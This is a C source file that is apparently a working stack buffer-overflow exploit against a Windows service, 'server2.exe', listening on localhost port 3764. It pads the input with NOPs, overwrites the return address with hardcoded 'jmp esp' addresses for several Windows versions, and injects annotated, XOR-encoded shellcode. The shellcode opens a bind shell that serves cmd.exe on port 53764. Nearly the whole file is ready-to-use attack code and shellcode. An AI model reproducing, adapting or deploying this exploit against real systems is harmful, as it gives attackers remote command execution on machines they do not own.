
#include <winsock2.h>
#include <winsock2.h>
#include <stdio.h>
#pragma comment (lib, "ws2_32")
#define WINXP

#ifdef WINXP
//#define JUMPESP "\xfc\x18\xd4\x77" user32.dll
#define JUMPESP "\xfb\x7b\xa2\x71" //ws2_32.dll
#endif

#ifdef WIN2000
#define JUMPESP "\x2a\xe3\xe2\x77"
#endif
#ifdef WIN98
#define JUMPESP "\xa3\x95\xf7\xbf"
#endif

unsigned char eip[8] = JUMPESP;
unsigned char sploit[580] = {
	0x90, /* nop */
	0x90, /* nop */
/* decoding data area, xor with 0x99 */
	0x8b, 0xfc, /* mov edi,esp */
	0x33, 0xc0, /* xor eax,eax ;eax = 0*/
	0x50, /* push eax ;push $0*/
	0xf7, 0xd0, /* not eax ;eax = 0xffff*/
	0x50, /* push eax ;push 0xffff*/
	0x59, /* pop ecx ;ecx = 0xffff*/
	0xf2, 0xaf, /* repne scas  dword ptr [edi] ;edi=end of the shellcode */
				/* find 0xff, 0xff, 0xff, 0xff, 0x0d, 0x0a (see the ending) */
	0x59, /* pop ecx ;ecx = 0*/
	0xb1, 0xc6, /* mov cl, C6 ;ecx=0xc6 (bytes of encoded module&function names)*/
	0x8b, 0xc7, /* mov eax, edi ;eax = end of the shellcode */
	/* XorData: */
	0x48, /* dec eax ;step by one byte */
	0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 ;decode */
	0xe2, 0xfa, /* loop XorData ;until exc0 */

/* load KERNEL32 function addresses */
	0x33, 0xf6, /* xor esi, esi ;esi=0*/
	0x96, /* xchg eax,esi ;eax=0, esi=begin addr of data*/
	0xbb, 0x99, 0xec, 0x61, 0x42, 	/* mov ebx, IAT_LoadLibrary */
	0xc1, 0xeb, 0x08,				/* shr ebx, 08 ;no null byte */
									/* 0x4261ec99 << 8 = 0x004261ec */
									/* address of IAT of LoadLibraryA in server2.exe */
	0x56, /* push esi ;push address of "KERNEL32" in the stack */
	0xff, 0x13, /* call dword ptr [ebx] ;call LoadLibrary("KERNEL32") */
	0x8b, 0xd0, /* mov edx, eax ;move base address of Kernel32.dll to edx */
	0xfc, /* cld ;clean direction flag, */
		  /* to cause string opreations to process from left to right */
	0x33, 0xc9, /* xor ecx, ecx ;ecx = 0*/
	0xb1, 0x0b, /* mov cl, 0B ;ecx=0x0b (count of functions need to GetProcAddress in Kernel32) */
	0x49, /* dec ecx ;ecx dec by one*/
			/* FIXME, why not "mov cl 0xoa" */
	/* loadKernelProcess: */
	0x32, 0xc0, /* xor al, al ;al = 0*/
	0xac, /* lods byte ptr [esi] ;al = [esi], get the byte at esi(data) into al*/
	0x84, 0xc0, /* test al, al ;test for null byte*/
	0x75, 0xf9, /* jne loadKernelProcess */
	0x52, /* push edx ;store Kernel32 module address */
	0x51, /* push ecx ;store ecx (count) */
	0x56, /* push esi ;function name address (call param2)*/
	0x52, /* push edx ;Kernel32 module address (call param1)*/ 
	0xb3, 0xe8, /* mov bl e8; now ebx = 0x004261e8 */
				/* address of IAT of GetProcAddress */
	0xff, 0x13, /* call dword ptr [ebx] ;call GetProcAddress to get the function's address */
	0xab, /* stos dword ptr [edi] */
		  /* store the return address in eax to memory index by edi (end of the shellcode) */
	0x59, /* pop ecx ;restore the ecx (count) from the stack */
	0x5a, /* pop edx ;restore the Kernel32 module base address from the stack */
	0xe2, 0xec, /* loop loadKernelProcess ;loop and get all function address */

/* load WSOCK32 function addresses */
	0x32, 0xc0, /* xor al, al */
	0xac, /* lods byte ptr [esi] */
	0x84, 0xc0, /* test al, al */
	0x75, 0xf9, /* jne 00000176 ;get next module (WSOCK32) name address*/
	0xb3, 0xec, /* mov bl ec, now ebx = 0x004261ec */
				/* address of IAT of LoadLibrary */
	0x56, /* push esi ;call param, address of module name*/
	0xff, 0x13, /* call dword ptr [ebx] ;call LoadLibrary("WSOCK32")*/
	0x8b, 0xd0, /* mov edx, eax ;move base address of WSOCK32.dll to edx */
	0xfc, /* cld ;clean direction flag, */
		  /* to cause string opreations to process from left to right */
	0x33, 0xc9, /* xor ecx, ecx ;ecx = 0*/
	0xb1, 0x06, /* mov cl, 06 */
	/* loadSocketProcess: */
	0x32, 0xc0, /* xor al, al */
	0xac, /* lods byte ptr [esi] */
	0x84, 0xc0, /* test al, al */
	0x75, 0xf9, /* jne loadSocketProcess */
	0x52, /* push edx ;store WSOCK32 module address */
	0x51, /* push ecx ;store ecx (count) */
	0x56, /* push esi ;function name address (call param2)*/
	0x52, /* push edx ;WSOCK32 module address (call param1)*/ 
	0xb3, 0xe8, /* mov bl e8; now ebx = 0x004261e8 */
				/* address of IAT of GetProcAddress */
	0xff, 0x13, /* call dword ptr [ebx] ;call GetProcAddress to get the function's address */
	0xab, /* stos dword ptr [edi] */
		  /* store the return address in eax to memory index by edi (end of the shellcode) */
	0x59, /* pop ecx ;restore the ecx (count) from the stack */
	0x5a, /* pop edx ;restore the WSOCK32 module base address from the stack */
	0xe2, 0xec, /* loop loadSocketProcess */

/*new socket and bind*/
	/*listenFD=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);*/	
	0x83, 0xc6, 0x05, /* add esi, 0x05 ;esi now pointer to sockstruc*/
					  /* edi=esp+4+shellcode+function_table(16*4) ;end of the shellcode*/
	0x33, 0xc0, /* xor eax, eax ;*/
	0x50, /* push eax ;protocol=0*/
	0x40, /* inc eax */
	0x50, /* push eax ;SOCK_STREAM=1*/
	0x40, /* inc eax */
	0x50, /* push eax ;AF_INET=2*/
	0xff, 0x57, 0xe8, /* call [edi-18] ;call socket(2,1,0)*/
	0x93, /* xchg eax,ebx ;ebx now contain listenFD*/
	/*ret=bind(listenFD,(sockstruc *)&server,sizeof(server));*/
	0x6a, 0x10, /* push 00000010 ;length of sockstruc*/
	0x56, /* push esi ;address of sockstruc*/
	0x53, /* push ebx ;listenFD*/
	0xff, 0x57, 0xec, /* call [edi-14] ;call bind(listenFD,(sockstruc *)&server,sizeof(server))*/
	0x6a, 0x02, /* push 00000002 ;2 connections*/
	0x53, /* push ebx ;SOCKET*/
	0xff, 0x57, 0xf0, /* call [edi-10] ;listen(SOCKET,2)*/ 

/*CreatePipe*/
	0x33, 0xc0, /* xor eax, eax */
	0x57, /* push edi */
	0x50, /* push eax ;0*/
	0xb0, 0x0c, /* mov al, 0C */
	0xab, /* stos dword ptr [edi] */
	0x58, /* pop eax */
	0xab, /* stos dword ptr [edi] */
	0x40, /* inc eax */
	0xab, /* stos dword ptr [edi] ;create SECURITY_ATTRIBUTES sa at edi*/
	0x5f, /* pop edi */
	0x48, /* dec eax ;eax=0*/
	0x50, /* push eax */
	0x57, /* push edi ;sa */
	0x56, /* push esi ;to ret write pipe1, sockstruc is rubbish now */
	0xad, /* lods dword ptr [esi] ;esi+4; eax=[esi]*/
	0x56, /* push esi ;to ret read pipe1 */
	0xff, 0x57, 0xc0, /* call [edi-40] ;ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); */ 
	0x48, /* dec eax ;eax=0*/
	0x50, /* push eax */
	0x57, /* push edi ;sa */
	0xad, /* lods dword ptr [esi] ;esi+4; eax=[esi]*/
	0x56, /* push esi ;to ret write pipe2, sockstruc is rubbish now */
	0xad, /* lods dword ptr [esi] ;esi+4; eax=[esi]*/
	0x56, /* push esi ;to ret read pipe2 */
	0xff, 0x57, 0xc0, /* call [edi-40] ;ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); */ 

/*run shell*/
	0x48, /* dec eax ;eax=0*/
	0xb0, 0x44, /* mov al, 44 */
	0x89, 0x07, /* mov dword ptr [edi], eax */
	0x57, /* push edi */
	0xff, 0x57, 0xc4, /* call [edi-3C] ;GetStartupInfo si, save at edi*/
	0x33, 0xc0, /* xor eax, eax */
	0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] */
	0x89, 0x47, 0x3c, /* mov dword ptr [edi+3C], eax ;si.hStdOutput=hWritePipe1*/
	0x89, 0x47, 0x40, /* mov dword ptr [edi+40], eax ;si.hStdError=hWritePipe1*/
	0x8b, 0x06, /* mov eax, dword ptr [esi] */
	0x89, 0x47, 0x38, /* mov dword ptr [edi+38], eax ;si.hStdInput=hReadPipe2 */
	0x33, 0xc0, /* xor eax, eax */
	0x66, 0xb8, 0x01, 0x01, /* mov ax, 0x0101 */
	0x89, 0x47,	0x2c, /* mov dword ptr [edi+2C], eax ;dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES*/
	0x57, /* push edi ;address of si*/
	0x57, /* push edi ;address of si*/
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;lpCurrentDirectory = NULL*/
	0x50, /* push eax ;lpEnvironment = NULL*/
	0x50, /* push eax ;dwCreationFlags = NULL*/
	0x40, /* inc eax */
	0x50, /* push eax ;bInheritHandles = true*/
	0x48, /* dec eax */
	0x50, /* push eax ;lpThreadAttributes=0*/
	0x50, /* push eax ;lpProcessAttributes=0*/
	0xad, /* lods dword ptr [esi] */
	0x56, /* push esi ;lpCommandLine=esi="cmd.exe"*/
	0x33, 0xc0, /* xor eax */
	0x50, /* push eax ;lpApplicationName=NULL*/
	0xff, 0x57, 0xc8, /* call [edi-38] ;call CreateProcessA, eax=1 ok, eax=0 error*/
	0xff, 0x76, 0xf0, /* push [esi-10] */
	0xff, 0x57, 0xcc, /* call [edi-34] */
	0xff, 0x76, 0xfc, /* push [esi-04] */
	0xff, 0x57, 0xcc, /* call [edi-34] ;CloseHandle*/
/*bind the shell with socket through the pipes*/
	0x48, /* dec eax ;0*/
	0x50, /* push eax */
	0x50, /* push eax */
	0x53, /* push ebx ;ebx contains the listenFD SOCKET */
	0xff, 0x57, 0xf4, /* call [edi-0C] ;SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);*/
	0x8b, 0xd8, /* mov ebx, eax ;ebx contains new listenFD(shell) SOCKET*/
	0x33, 0xc0, /* xor eax, eax */
	0xb4, 0x04, /* mov ah, 04 ;1024*/
	0x50, /* push eax */
	0xc1, 0xe8, 0x04, /* shr eax, 04; eax=64: GMEM_FIXED+GMEM_ZEROINIT*/
	0x50, /* push eax */
	0xff, 0x57, 0xd4, /* call [edi-2C] ;GlobalAlloc 1024*/
	0x8b, 0xf0, /* mov esi, eax ;esi contains the buffer*/
	/*PeekPipe: */
	0x33, 0xc0, /* xor eax, eax */
	0x8b, 0xc8, /* mov ecx, eax */
	0xb5, 0x04, /* mov ch, 04 */
	0x50, /* push eax ;lpBytesLeftThisMessage =0*/
	0x50, /* push eax ;lpTotalBytesAvail=0 */
	0x57, /* push edi ;lpBytesRead*/
	0x51, /* push ecx ;nBufferSize=1024*/
	0x56, /* push esi ;lpBuffer*/
	0xff, 0x77, 0xa8, /* push [edi-58] ;hReadPipe1*/
	0xff, 0x57,	0xd0, /* call [edi-30] ;ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);*/
	0x83, 0x3f, 0x01, /* cmp dword ptr [edi], 00000001 ;[edi] contains bytes to read*/
	0x7c, 0x22, /* jl GetUserInput */
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;lpOverlapped = NULL*/
	0x57, /* push edi ;lpNumberOfBytesRead*/
	0xff, 0x37, /* push dword ptr [edi] ;nNumberOfBytesToRead*/
	0x56, /* push esi ;lpBuffer*/
	0xff, 0x77, 0xa8, /* push [edi-58] ;hReadPipe1*/
	0xff, 0x57, 0xdc, /* call [edi-24] ;ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);*/
	0x0b, 0xc0, /* or eax, eax */
	0x74, 0x2f, /* je GameOver */
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;flag=0*/
	0xff, 0x37, /* push dword ptr [edi] ;len*/
	0x56, /* push esi ;buf*/
	0x53, /* push ebx ;clientFD*/
	0xff, 0x57, 0xf8, /* call [edi-08] ;ret=send(clientFD,Buff,lBytesRead,0);*/
	0x6a, 0x50, /* push 00000050 ;*/
	0xff, 0x57, 0xe0, /* call [edi-20] ;sleep(50)*/
	0xeb, 0xc8, /* jmp PeekPipe */
	/* GetUSerInput: */
	0x33, 0xc0, /* xor eax, eax */
	0x50, /* push eax ;eax=0*/
	0xb4, 0x04, /* mov ah, 04 */
	0x50, /* push eax ;1024*/
	0x56, /* push esi ;buf*/
	0x53, /* push ebx ;clientFD*/
	0xff, 0x57, 0xfc, /* call [edi-04] ;lBytesRead=recv(clientFD,Buff,1024,0);*/
	0x57, /* push edi ;lpOverlapped*/
	0x33, 0xc9, /* xor ecx, ecx */
	0x51, /* push ecx ;pointer to number of bytes written*/
	0x50, /* push eax ;nNumberOfBytesToWrite*/
	0x56, /* push esi ;buf*/
	0xff, 0x77, 0xac, /* push [edi-54] ;hWritePipe2*/
	0xff, 0x57, 0xd8, /* call [edi-28] ;ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)*/
	0x6a, 0x50, /* push 00000050 ;*/
	0xff, 0x57, 0xe0, /* call [edi-20] ;sleep(50)*/
	/* GameOver: */
	0xeb, 0xaa, /* jmp PeekPipe */
	0x50, /* push eax */
	0xff, 0x57, 0xe4, /* call [edi-1C] ;ExitProcess*/
/*Our Data*/
	/*  ^^^^ start of module and function name table */
	0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
	0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
	0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
	0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
	0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
	0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
	0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
	0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
	0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
	0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
	0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
	0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
	0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
	0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
	0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
	0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764
	0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
	0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
	0x0d, 0x0a
};

int main()
{
        WSADATA wsa;
        SOCKET sockFD;
        char Buff[1024],*sBO;

        WSAStartup(MAKEWORD(2,2),&wsa);

        sockFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

        struct sockaddr_in server;

        server.sin_family = AF_INET;
        server.sin_port = htons(3764);
        server.sin_addr.s_addr=inet_addr("127.0.0.1");

        connect(sockFD,(struct sockaddr *)&server,sizeof(server));
        for(int i=0;i<56;Buff[i++]=0x90);
        strcpy(Buff+56,(char *)eip);
        strcpy(Buff+60,(char *)sploit);
        sBO = Buff;
        send(sockFD,sBO,56+4+560,0);

        closesocket(sockFD);
        WSACleanup();
        return 1;

}
